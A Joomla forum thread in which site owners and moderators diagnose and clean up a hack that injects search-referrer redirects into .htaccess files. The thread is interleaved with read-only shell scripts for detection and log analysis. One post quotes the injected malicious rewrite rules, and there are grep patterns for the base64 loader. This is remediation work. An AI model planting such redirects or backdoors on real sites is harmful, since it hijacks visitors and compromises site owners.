Joomla .htaccess hacked to xxx.ru
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 26
- Joined: Mon Sep 11, 2006 2:23 pm
- Location: Argentina
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
Hi: this post had been really useful to me, I had removed the hack using the list of things to check, by PhilD.
In my case, I don’t know how the infection began, but it is possible that it was due to a poor admin password. When you install Joomla for the first time, it asks for an administrator username and pass, and a lot of people just type admin in both cases. Any simple script that uses brute force methods to enter the administrator can try using those easy passwords and enter really easily.
So these are my suggestions...
1- Never use easy to guess passwords, even in testing sites, or provisory installations;
2- If you ever need to see the changes on a site but your ISP (company used to login to Internet) has a cache so your ISP cache is not cleaned, you can always surf anonymously using tools like... anonymouse.org so you can see how the rest of the world is seeing your site;
3- if you want to check if there are other files infected on your server, and you have root access, you can use PUTTY and enter via SSH to your server (Linux) and type this line...
find /home -type f -iname "*.php" -print0 | xargs -0 egrep 'gzuncompress\(base64_decode'
This will check on every file to see if the hacked code is still there.
If you need anything else you are always free to post questions here or contact me...
-
- Joomla! Fledgling
- Posts: 1
- Joined: Fri Aug 03, 2012 8:50 pm
Re: Joomla .htaccess hacked to xxx.ru
I tried a few things like updating to 1.5.26 but the .htaccess files kept reappearing.
I used Cpanel's Virus Scanner and it found the file images/stories/story.php
I removed it and it worked for me.
No more htaccess files appeared.
- HackRepair
- Joomla! Apprentice
- Posts: 17
- Joined: Wed Apr 25, 2012 10:52 pm
- Location: San Diego
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
Though if you've found a hacked file within your account you should assume the entire account has been compromised and take action accordingly.
The thief is likely still hiding in your closet.
- pe7er
- Joomla! Master
- Posts: 24934
- Joined: Thu Aug 18, 2005 8:55 pm
- Location: Nijmegen, Netherlands
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
gaudigabriels wrote:I tried a few things like updating to 1.5.26 but the .htaccess files kept reappearing.
I used Cpanel's Virus Scanner and it found the file images/stories/story.php
I removed it and it worked for me.
Make sure that all your 3rd party extensions are up to date!
Last week I solved the same problem with unwanted redirections for a new customer.
It contained a couple of .htaccess files with redirects to other websites, and also /images/stories/story.php
At their site it was caused by an old not-updated version of JCE editor which contained an insecurity.
Which has been solved in the most recent JCE versions.
Kind Regards,
Peter Martin, Global Moderator
Company website: https://db8.nl/en/ - Joomla specialist, Nijmegen, Netherlands
The best website: https://the-best-website.com
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
gaudigabriels wrote:I tried a few things like updating to 1.5.26 but the .htaccess files kept reappearing.
I used Cpanel's Virus Scanner and it found the file images/stories/story.php
I removed it and it worked for me.
No more htaccess files appeared.
Deleting all folders/files is the only sure way to get rid of it.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- Slackervaara
- Joomla! Ace
- Posts: 1115
- Joined: Sat Aug 13, 2011 6:27 am
Re: Joomla .htaccess hacked to xxx.ru
Did you look at when story.php was modified? It can give you information about when the hack was made. In addition you could look in the access logs at that time and find out how the hack was made. You will also get the hacker's IP address and then you can check what else he has done on your site. You can also ban the hacker's IP address in your .htaccess and report abuse to his ISP.
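One way to do the log work described in the post above, as an added example that is not from any poster in this thread. It assumes an Apache "combined" access log written in the server's local time zone and GNU `date`; the function names, the sample log lines, the IP addresses and the `com_example` request are constructed for illustration.

```shell
#!/bin/sh
# Added example: pivot through an Apache "combined" access log, starting from
# a known backdoor file. Read-only. sample_log prints constructed log lines.

sample_log() {
    cat <<'EOF'
198.51.100.7 - - [18/Aug/2012:10:58:41 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.50 - - [18/Aug/2012:11:28:59 +0000] "POST /index.php?option=com_example HTTP/1.1" 200 312 "-" "constructed-agent"
203.0.113.50 - - [18/Aug/2012:11:29:03 +0000] "GET /images/stories/story.php HTTP/1.1" 200 18 "-" "constructed-agent"
198.51.100.7 - - [18/Aug/2012:11:40:10 +0000] "GET /images/stories/logo.gif HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.50 - - [18/Aug/2012:12:14:20 +0000] "POST /images/stories/story.php?x=1 HTTP/1.1" 200 0 "-" "constructed-agent"
203.0.113.77 - - [18/Aug/2012:12:59:45 +0000] "POST /images/stories/story.php HTTP/1.1" 200 0 "-" "constructed-agent"
EOF
}

# Requests logged in the same hour as FILE's last-modified time.
# Whoever wrote the file can reset its mtime, so treat the result as a lead
# and confirm it with the path-based pivot below.
requests_in_mtime_hour() {    # usage: requests_in_mtime_hour LOG FILE
    hour=$(LC_ALL=C date -r "$2" '+%d/%b/%Y:%H') || return 1
    grep -F "[$hour:" "$1" |
        awk '{ print $1, substr($4, 2), substr($6, 2), $7, $9 }'
}

# Clients that requested URLPATH (query string ignored), busiest first.
clients_for_path() {          # usage: clients_for_path LOG URLPATH
    awk -v p="$2" '
        { split($7, u, "[?]") }
        u[1] == p { hits[$1]++ }
        END { for (ip in hits) print hits[ip], ip }
    ' "$1" | sort -k1,1nr -k2,2
}

# Everything those clients did, in log order. The requests just before the
# first hit on URLPATH are the candidates for how the file got there.
activity_of_clients() {       # usage: activity_of_clients LOG URLPATH
    awk -v p="$2" '
        NR == FNR { split($7, u, "[?]"); if (u[1] == p) seen[$1] = 1; next }
        $1 in seen { print $1, substr($4, 2), substr($6, 2), $7, $9 }
    ' "$1" "$1"
}
```

Each output line is `client timestamp method path status`; rotated and compressed logs need to be unpacked into one file first.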
-
- Joomla! Apprentice
- Posts: 14
- Joined: Sat Jul 05, 2008 7:14 pm
Re: Joomla .htaccess hacked to xxx.ru
Hi, i just want to say thanx to BernardT, using his script i managed to detect backdoor file on my server. It was hidden in images/stories/ folder in two files:
story.php and cache_uthqek.php
my htaccess file was reinfecting every 45mins, after deleting these two files htaccess remains clean.
I believe i got infected due to old version of joomla, or old JCE editor plugin, now i updated both of them. I was fighting against this malware near 3 days, and while i was fighting i was changing back to normal my htaccess file just not to get on list of malicious sites on google and other sites. later i made cronjob that copies clean htaccess file every minute, that gave me time to search for backdoor and to be clean in eyes of visitors and browsers.
-
- Joomla! Fledgling
- Posts: 1
- Joined: Sat Aug 18, 2012 11:29 am
Re: Joomla .htaccess hacked to xxx.ru
In every case of this hack that I cleaned up so far there was a hidden script in images/stories/ called something like .cache_i24tgg.php. That is also part of this hack. Delete that script, story.php and all .htaccess files and update Joomla to your most recent version.
To deploy the scripts an exploit for JCE is being used. The vulnerability has been patched on 29 August 2011 and updating Joomla to a release after that will fix it. Alternatively you can just patch JCE using the vendor supplied patch at http://www.joomlacontenteditor.net/news ... 1-released.
Hope this helps some of you!
-
- Joomla! Fledgling
- Posts: 1
- Joined: Tue Aug 21, 2012 1:53 am
Re: Joomla .htaccess hacked to xxx.ru
I got this too! After clearing cache within Joomla control panel, I still have a file called "cache_inelin.php" under the folder "tmp". Inside of this file there's a suspicious line:
$icon = preg_replace('#\.[^.]*$#', '', $icon);
The virus stopped rewriting .htaccess after removing this file.
Anybody know where is the security hole in addition to JCE?
-
- Joomla! Explorer
- Posts: 359
- Joined: Thu Jun 14, 2007 2:48 pm
- Location: Coppell, Texas
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
If you have an old version of NoNumber extensions you need to update it http://www.nonumber.nl/news/releases/28 ... extensions
and check the vulnerable extensions list also. http://docs.joomla.org/Vulnerable_Extensions_List
Make sure all your extensions are the latest versions.
-
- Joomla! Apprentice
- Posts: 26
- Joined: Sat Aug 20, 2005 1:36 pm
- Location: Norway
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
I have also had this on several Joomla! sites on different servers. On all of these, the JCE was old. In all cases it was a file called story.php under /images/stories. There were also other infected files but the story.php was common for all. On the latest hack, the file was renamed to story.gif.
-
- Joomla! Apprentice
- Posts: 9
- Joined: Tue Feb 23, 2010 3:36 am
- Location: Melbourne VIC Aust.
- Contact:
htaccess Redirect Attack
Hi,
In the last week or so my site at http://www.rinet.com .au has been attacked somehow.
The result is that the .htaccess file has been modified with
Code:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|[youtube]|wikipedia|qq|excite|alaarchiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-land|browseireland|finditireland|iesearch|ireland-ikz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]
</IfModule>
... and ...
Code:
ErrorDocument 500 http://gdrivedownuntil. pro/creation?8
after the legitimate htaccess data.
There are lots of spaces in front to try and hide what the hacker is doing.
When finished it modifies the .htaccess to permissions 444 removing the owner write access to make editing the file back again just a little bit annoying.
The net effect is when some images are requested they get a "301 Moved Permanently" error being redirected to places such as:
http://phonesthoughuploader .info
http://imagesworsetightened .info
http://midaugustoperations .pro
and the latest one is http://gdrivedownuntil .pro
The new destinations seem to be dead.
I have tried restoring an old backup but the problem is still there.
Users of phpBB have reported the same issue.
Any help would be much appreciated.
Thanks.
Any help
Last edited by mandville on Tue Aug 28, 2012 1:52 pm, edited 1 time in total.
Reason: broke links for security reasons, trimmed code. moved from 2.5 to 1.5
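The artefacts reported in this thread so far (PHP files under images/ and tmp/, hidden `.cache_*.php` scripts, story.php renamed to story.gif, the `gzuncompress(base64_decode` loader, and .htaccess files with injected redirects left at mode 444) gathered into one read-only triage pass. This is an added example, not from any poster; the function name and the reason labels are made up for it.

```shell
#!/bin/sh
# Added example: read-only triage of a web root for the artefacts reported in
# this thread. Prints "REASON ./relative/path" lines and changes nothing.
# The REASON labels are made up for this example.

scan_webroot() {
    (
        # Work with paths relative to the web root, so that a parent directory
        # that happens to be called tmp or images cannot match the tests below.
        cd "$1" || exit 1
        {
            # 1. PHP scripts where only uploads and cache files belong. find
            #    does not skip dotfiles, so hidden .cache_*.php files show up.
            find . -type f \( -path '*/images/*' -o -path '*/tmp/*' \) \
                -iname '*.php' -print |
                sed 's/^/PHP_IN_DATA_DIR /'

            # 2. Files there with another extension that still carry a PHP
            #    open tag (the story.gif case).
            find . -type f \( -path '*/images/*' -o -path '*/tmp/*' \) \
                ! -iname '*.php' -exec grep -lF '<?php' {} + |
                sed 's/^/PHP_TAG_IN_NON_PHP /'

            # 3. The packed loader the first post greps for, in any PHP file.
            find . -type f -iname '*.php' \
                -exec grep -lE 'gzuncompress\(base64_decode' {} + |
                sed 's/^/PACKED_LOADER /'

            # 4. .htaccess files whose RewriteRule or ErrorDocument points at
            #    an absolute URL. Leading whitespace is allowed because the
            #    injected lines are padded with spaces. A site's own redirects
            #    match too, so review each hit.
            find . -type f -name '.htaccess' -exec grep -liE \
                '^[[:space:]]*(RewriteRule|ErrorDocument)[[:space:]].*https?://' {} + |
                sed 's/^/HTACCESS_EXTERNAL_REDIRECT /'

            # 5. .htaccess files left read-only for everyone (mode 444).
            find . -type f -name '.htaccess' -perm 444 -print |
                sed 's/^/HTACCESS_READ_ONLY /'
        } | LC_ALL=C sort
    )
}

# Usage: sh scan.sh /path/to/webroot
if [ "$#" -gt 0 ]; then
    scan_webroot "$1"
fi
```

An empty result only means these particular patterns were not found; it does not show the account is clean.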
-
- Joomla! Apprentice
- Posts: 9
- Joined: Tue Feb 23, 2010 3:36 am
- Location: Melbourne VIC Aust.
- Contact:
Re: htaccess Redirect Attack
Should have mentioned I am running Joomla! 1.5.26 ... and I've put in the wrong forum, sorry.
- mandville
- Joomla! Master
- Posts: 15150
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: htaccess Redirect Attack
this topic is highly relevant http://forum.joomla.org/viewtopic.php?f=432&t=705216
glenn3095 wrote:Users of phpBB have reported the same issue.
and what are phpbb doing about this hack?
when/if you respond i will merge with the associated topic
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- wernejo
- Joomla! Enthusiast
- Posts: 231
- Joined: Sun Jun 17, 2007 9:17 am
- Location: Australia
- Contact:
Re: htaccess Redirect Attack
you got hacked as well?
one of my websites has been hit the same way. i have just deleted the current website and uploaded a back up but nothing has changed.
i noticed that a bunch of .htaccess files had been scattered around the main directories but i still deleted everything but the configuration.php
this is also the second website in the last week that was hacked in a similar way.
the last website was easily fixed after the backup was uploaded.
any advice?
-
- Joomla! Apprentice
- Posts: 9
- Joined: Tue Feb 23, 2010 3:36 am
- Location: Melbourne VIC Aust.
- Contact:
Re: htaccess Redirect Attack
I too tried restoring from Akeeba backup but the problem came back.
Next I followed the advice given elsewhere in the forum of blowing away all folders, keeping only the images and templates folders on your PC. Then I did a clean install using the full 1.5.26 package.
Deleted the installation folder, copy configuration.php back up to the root folder. Then restore your additional images, checking each file for malicious code (inspect it in a binary viewer). Then restore your template folder (additional template only) checking each file for malicious code again.
You are basically leaving the database intact but in removing all folders malicious files get deleted as well :-)
I found the best thing for additional modules etc is to uninstall them before deleting your site. I found overwriting with a fresh install didn't work too well for some modules/plugins.
So far my site seems to be OK.
- wernejo
- Joomla! Enthusiast
- Posts: 231
- Joined: Sun Jun 17, 2007 9:17 am
- Location: Australia
- Contact:
Re: htaccess Redirect Attack
glenn3095 wrote:I too tried restoring from Akeeba backup but the problem came back.
Next I followed the advice given elsewhere in the forum of blowing away all folders, keeping only the images and templates folders on your PC. Then I did a clean install using the full 1.5.26 package.
Deleted the installation folder, copy configuration.php back up to the root folder. Then restore your additional images, checking each file for malicious code (inspect it in a binary viewer). Then restore your template folder (additional template only) checking each file for malicious code again.
You are basically leaving the database intact but in removing all folders malicious files get deleted as well :-)
I found the best thing for additional modules etc is to uninstall them before deleting your site. I found overwriting with a fresh install didn't work too well for some modules/plugins.
So far my site seems to be OK.
i've just had our 3rd website hacked in this same manner.
the method i have used so far is download a copy of the templates css, html, and images folders and files, then do the same for the images in the stories file and then do the same for any other folder that is part of an extension that's been installed. i also grabbed a copy of any other important files except for any .htaccess files i found.
because the database is fine, all you need to do is delete the current site and all the files then upload a backup and restore any key files such as the template, images, and extensions you have installed.
you need to remove all of the core files that were on the server when it got hacked or it will not go away.
it will also take a little while for google to check your site again so don't panic.
- Digital Island
- Joomla! Apprentice
- Posts: 39
- Joined: Thu Mar 08, 2007 1:17 am
- Contact:
Re: .htaccess Redirect Hack
PhilD wrote: Because this code can be within almost any file within a site and it is recommended that one follow the points below. Only by doing this can one be assured the code is truly removed from the site.
Excellent post serve me as a life saver, but also this is extended to all that in good faith helped me to analyze (still doing it) and solve the issue. (I am also considering to thank to the one that compromised my security because he obliged me to learn, but not sure :-)
For the records, I got compromised affecting some Joomla and WP (Can I mention it?:-) solve it here because it happened through Joomla. For anyone else coming to this post just follow PhilD instructions but worth to read all.
Now I learn I need to review more frequently the Joomla! Documentation - Vulnerable Extensions List http://feeds.joomla.org/JoomlaSecurityV ... Extensions and this security forum.
I love Joomla but Joomla community makes me love it more.
"We do not have to visit a madhouse to find disordered minds; our planet is the mental institution of the universe.”
-
- Joomla! Explorer
- Posts: 377
- Joined: Wed May 30, 2007 7:55 am
Re: Joomla .htaccess hacked to xxx.ru
Yeah, I think this is worldwide attack on the 1.5 versions. I would suggest the security team check this because I had this attack about 2 weeks ago and it whacked all my 1.5 sites on a single server. Here's my post of the incident. http://forum.joomla.org/viewtopic.php?f=432&t=749242
Although I do and always appreciate the support from Joomla!, I ran the FPA as suggested and unfortunately didn't find jack.! So I had to inspect the server logs for unusual activity and found a backdoor file installed within the images folder. I took it out and the attack was gone. I then installed an unhacked backup and changed all passwords (backend, FTP, Hosting, DB, everything!)... even installed a firewall on my sites just to be safe from now on.
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
@crazydriver
What version(s) of 1.5 were you running ?
Posting the FPA outputs for (your sites) on here would help locate the error.
Unless you post the FPA results on here we have no way of ascertaining the accuracy of your conclusion.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Explorer
- Posts: 377
- Joined: Wed May 30, 2007 7:55 am
Re: Joomla .htaccess hacked to xxx.ru
Webdongle wrote:@crazydriver
What version(s) of 1.5 were you running ?
Posting the FPA outputs for (your sites) on here would help locate the error.
Unless you post the FPA results on here we have no way of ascertaining the accuracy of your conclusion.
Hello Webdongle,
Did you see the post I made about my hack incident? The FPA is in the link I posted. Here's the link of the thread I made. http://forum.joomla.org/viewtopic.php?f=432&t=749242
Actually to be exact here: http://forum.joomla.org/viewtopic.php?f ... 2#p2887684
Unfortunately, I didn't get a response relating to what was wrong in the report. I ran the FPA on a hacked site and I posted it in the link above. I also got much useful advice from other users on the forum who also had the same or similar problem. However grateful, there was no real fix and the .htaccess kept changing on its own every 30 minutes to an hour despite uploading an unhacked .htaccess file.
I fixed my problem by looking at my server logs to pinpoint what was changing my .htaccess. There was unusual activity going to a malicious file in images/stories/banners. I erased it and installed an unhacked backup. I also installed a firewall on to my sites. I then waited for another attack but it never happened. I guess that solved it.
If you got a better solution, I'm all ears.
Thank you for your time on this matter.
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
Not got a better solution than that posted by mandville. Am looking to see if I can help you locate the point of entry so as to help you prevent it happening again.
That FPA output is for one of your sites ... you said you have more than one.
Are all your sites 1.5.26 ?
Have not got the time to check all the myriad of extensions(you have installed) with the VEL. Or to check if they are up to date. Have you meticulously checked each and every one was up to date before the hack ?
I can see you like custom Templates ... where do you download them from ?
Have all the computers that have server/ftp/admin access been checked for Trojans ?
Is it a shared Hosting package ?(it could have spread from another site on shared Hosting).
Who is your Host ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Explorer
- Posts: 377
- Joined: Wed May 30, 2007 7:55 am
Re: Joomla .htaccess hacked to xxx.ru
Thanks for the reply.
All sites are 1.5.26. They were all updated soon after the security notice.
For the templates, I'm an RT member so straight from the club site.
As with the trojans, I have run Avast and malware and found nothing.
I use several shared servers for my websites but just one was affected. Only sites within that attacked server were affected.
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
crazydiver wrote:...
All sites are 1.5.26. They were all updated soon after the security notice.
...
Some sites were infected in November but not noticed until recently. There is a possibility that one of the 1.5.25 sites was infected before the update came out. Updating prevents sites being infected but does not eradicate an exploit that already exists. Unfortunately (often) the exploit has to be in the 'wild' before a fix for it can be made. Did you make a note of the 'last modified date' of .htaccess (or other infected files) ? That would give you a date the exploit started to take effect but (sadly) not the date it entered the server.
crazydiver wrote:....
As with the trojans, I have run Avast and malware and found nothing.
....
If the exploit entered the server before the patch was released then any infected browser visiting the site could have infected the server. Otherwise is your computer the only one that has ftp, server or Admin access ?
crazydiver wrote:...
I use several shared servers for my websites but just one was affected. Only sites within that attacked server were affected.
Have you inspected the logs from that server ? It could provide info on how and when the exploit entered the server.
If you deleted everything on the server and rebuilt as per the official advice (posted by mandville) ... and nothing is amiss now ... then it is likely that the exploit entered before the patch was produced ? Only examination of the server logs will confirm if the exploit entered before or after the update to 1.5.26.
Because viruses, exploits, etc. are often out in the wild before a remedy is produced is the main reason why deleting of ALL the files on the server is recommended. Because the exploit can be in backed up files of the site.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- Tomoe
- Joomla! Apprentice
- Posts: 48
- Joined: Tue Sep 16, 2008 3:49 pm
Re: Joomla .htaccess hacked to xxx.ru
What a nightmare ! On the server, I have one real site and test sites. Among them, 1.5 site and even 1.7 site. Of course, after testing, I didn't make any upgrade or delete these sites. Fatal error. Everything is infected. I cleared .htaccess problem, no more redirection, but there's still iframes in all pages of all sites. I deleted old sites, but now I have to clean and restore the site and a test site I was working on.
Thus, I have some questions.
1/ Is the database safe in spite of this attack ?
2/ Is there any risk of corruption of images ? Not unknown images but images clearly identified with my own regular names.
3/ Do I have to erase files and folders not linked with Joomla ? I'm afraid the answer is "yes"...
4/ What is the safer way to backup templates and overrides ?
5/ Is there any risk using the backoffice ?
Thanks for your help.
- Webdongle
- Joomla! Master
- Posts: 44037
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Joomla .htaccess hacked to xxx.ru
Tomoe wrote:...
Thus, I have some questions.
1/ Is the database safe in spite of this attack ?
2/ Is there any risk of corruption of images ? Not unknown images but images clearly identified with my own regular names.
3/ Do I have to erase files and folders not linked with Joomla ? I'm afraid the answer is "yes"...
4/ What is the safer way to backup templates and overrides ?
5/ Is there any risk using the backoffice ?
Thanks for your help.
- Probably please see Before you post please read this
- Yes ... best to replace those with the originals
- Correct all folders/files
- http://extensions.joomla.org/extensions ... ackup/1606 is good to backup the whole site. But be aware that the hack can exist for several months before it is discovered. So your backups may contain hacked files.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- Tomoe
- Joomla! Apprentice
- Posts: 48
- Joined: Tue Sep 16, 2008 3:49 pm
Re: Joomla .htaccess hacked to xxx.ru
Webdongle wrote:
- Probably please see Before you post please read this
- Yes ... best to replace those with the originals
- Correct all folders/files
- http://extensions.joomla.org/extensions ... ackup/1606 is good to backup the whole site. But be aware that the hack can exist for several months before it is discovered. So your backups may contain hacked files.
Thanks Webdongle.
- Read, but I confess I don't know how to complete some points.
- Problem : there's auto-generated images in several sizes. So, if I don't download it, there will be some recognition problem.
- Nightmare...
- Excuse me, I think I made a mistake in my question. Thing is not using or not using Akeeba (very good component, by the way), it's the opportunity to download template files. Because there are differences I can't explain clearly between local site and online site. Problem is that local site is on a previous version of Joomla! (site takes time to be built).
- Rephrasing the question : will it get worse if I use the backend to see or modify some settings ?
- muddauber
- Joomla! Ace
- Posts: 1618
- Joined: Thu Jun 08, 2006 11:26 pm
Re: Joomla .htaccess hacked to xxx.ru
I know several people said that it is unlikely the database is altered, but I would
strongly recommend you check to see all the users in the database via
PhpAdmin. I have found an extra admin on several hacked sites.
Another tip is to use the IP address of account to access site during troubleshooting,
this can bring up server and network caching issues. Also, your browser needs to
have caching disabled, or you'll be going in circles during this whole process.
Regarding your host, run, don't walk, away from them as fast as you can.
Since you said your Joomla and HTML sites have been hacked it is more
likely a shared server intrusion where they could get to all your directories.
If they get into your sites and directories, sometimes they'll start working
some additional hacks, including embedding scripts in your template
files.
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Joomla .htaccess hacked to xxx.ru
The comment should have been more clear. Always check for users that don't belong. Extra admins are common and there are a number of ways to check for them. Use whatever method you're comfortable with, but do check them.
What is meant by the general comment though is that the articles etc. are seldom altered in such a way to effect a hack and thus it is generally ok to reuse the database.
htaccess hacks can affect your entire domain. It does not matter if your site is a CMS site, a forum, or a plain HTML site, any and all can be affected. They do not necessarily affect other sites on the same server, as the files that cause the hack are normally local to one or more sites within the domain or master account you have. There are also hidden files that reside outside of your public_html area that will copy the bad htaccess code back into any htaccess found in the public_html area of your domain. These must also be removed.
PhilD
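One way to audit an account for what the post above describes (an added example, not part of the original thread): it reports every .htaccess, inside or outside public_html, with a redirect-capable directive pointing at a host you do not own, and lists hidden files outside the web root for manual review. `ALLOWED_HOSTS`, the sample tree and `redirect.example.invalid` are constructed for illustration.

```shell
#!/bin/sh
# Hosts you own, space separated (assumption: replace with your own).
ALLOWED_HOSTS="www.example.org example.org"

# Print "file: directive" for each redirect-capable directive, in any
# .htaccess under $1, whose URL points at a host not in ALLOWED_HOSTS.
scan_htaccess() {
    find "$1" -type f -name '.htaccess' -print | while IFS= read -r f; do
        grep -iE '^[[:space:]]*(RewriteRule|Redirect[A-Za-z]*|ErrorDocument)[[:space:]]' "$f" |
        while IFS= read -r line; do
            host=$(printf '%s\n' "$line" | sed -nE 's#.*https?://([^/:" ]+).*#\1#p')
            case "$host" in ''|'%{'*) continue ;; esac   # no URL, or a server variable
            case " $ALLOWED_HOSTS " in
                *" $host "*) ;;                           # one of our own hosts
                *) printf '%s: %s\n' "$f" "$line" ;;
            esac
        done
    done
}

# List hidden regular files under account root $1 that sit outside the
# web root $2; legitimate dotfiles appear too, so review each one.
hidden_outside_docroot() {
    find "$1" -path "$2" -prune -o -type f -name '.*' -print
}

# Build a constructed sample account tree and print its path.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/public_html/forum" "$t/.cache"
    printf 'RewriteEngine On\nRewriteRule ^(.*)$ https://www.example.org/$1 [R=301,L]\n' \
        > "$t/public_html/.htaccess"
    printf 'RewriteCond %%{HTTP_REFERER} search\nRewriteRule .* http://redirect.example.invalid/ [R,L]\n' \
        > "$t/public_html/forum/.htaccess"
    printf 'ErrorDocument 404 http://redirect.example.invalid/\n' > "$t/.cache/.htaccess"
    : > "$t/.cache/.sys.php"
    printf '%s\n' "$t"
}

tree=$(make_sample_tree)
scan_htaccess "$tree"
hidden_outside_docroot "$tree" "$tree/public_html"
rm -rf "$tree"
```

On a real account, pass the account home directory as the root and its public_html as the web root.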
-
- Joomla! Apprentice
- Posts: 7
- Joined: Sat Jul 20, 2013 9:28 am
Re: Joomla .htaccess hacked to xxx.ru
I found a very good tool for free online scanning for Joomla websites. Hacking and malware attacks are a common problem for Joomla based sites. I scan my website in [removed]. It helps me every time diagnosing affected files. I replace those affected files and the site displays without any trouble. Let me know if it's helpful for you anyhow.
Last edited by mandville on Sat Jul 20, 2013 10:32 am, edited 1 time in total.
Reason: removed link to self promotional site.